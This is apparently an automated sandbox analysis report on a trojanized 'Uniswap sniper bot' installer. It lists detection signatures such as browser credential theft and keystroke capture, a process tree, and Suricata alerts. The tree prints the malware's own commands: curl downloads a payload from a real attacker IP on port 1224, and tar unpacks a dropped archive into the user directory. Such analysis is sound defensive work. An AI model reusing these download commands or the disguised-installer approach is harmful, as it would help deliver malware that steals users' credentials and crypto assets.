Analysis Report
uniswap-sniper-bot-with-gui Setup 1.0.0.exe
Overview
General Information
Detection
Score: 56 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Suricata IDS alerts for network traffic
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- uniswap-sniper-bot-with-gui Setup 1.0.0.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe" MD5: 48C179680E0B37D0262F7A402860B2A7)
  - cmd.exe (PID: 5776 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv | "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - tasklist.exe (PID: 2536 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
  - find.exe (PID: 4504 cmdline: "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
- uniswap-sniper-bot-with-gui.exe (PID: 7036 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)
  - cmd.exe (PID: 348 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - curl.exe (PID: 6412 cmdline: curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  - uniswap-sniper-bot-with-gui.exe (PID: 6480 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1868,i,2021513904842527693,10398720277776728478,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)
  - explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  - uniswap-sniper-bot-with-gui.exe (PID: 1712 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2052 --field-trial-handle=1868,i,2021513904842527693,10398720277776728478,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)
  - uniswap-sniper-bot-with-gui.exe (PID: 4900 cmdline: "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=6357920942 --mojo-platform-channel-handle=2376 --field-trial-handle=1868,i,2021513904842527693,10398720277776728478,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 MD5: 45A55A09F6C74E7EAD24EE3FD391C8FF)
  - cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - tar.exe (PID: 7764 cmdline: tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24)
- cleanup
No configs have been found
No yara matches
Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-25T18:54:00.731104+0100 | 2036752 | 1 | A Network Trojan was detected | 86.104.74.51 | 1224 | 192.168.2.4 | 49739 | TCP |
2024-11-25T18:54:02.561716+0100 | 2036752 | 1 | A Network Trojan was detected | 86.104.74.51 | 1224 | 192.168.2.4 | 49739 | TCP |
2024-11-25T18:54:39.261066+0100 | 2036752 | 1 | A Network Trojan was detected | 86.104.74.51 | 1224 | 192.168.2.4 | 49739 | TCP |
2024-11-25T18:54:41.144037+0100 | 2036752 | 1 | A Network Trojan was detected | 86.104.74.51 | 1224 | 192.168.2.4 | 49739 | TCP |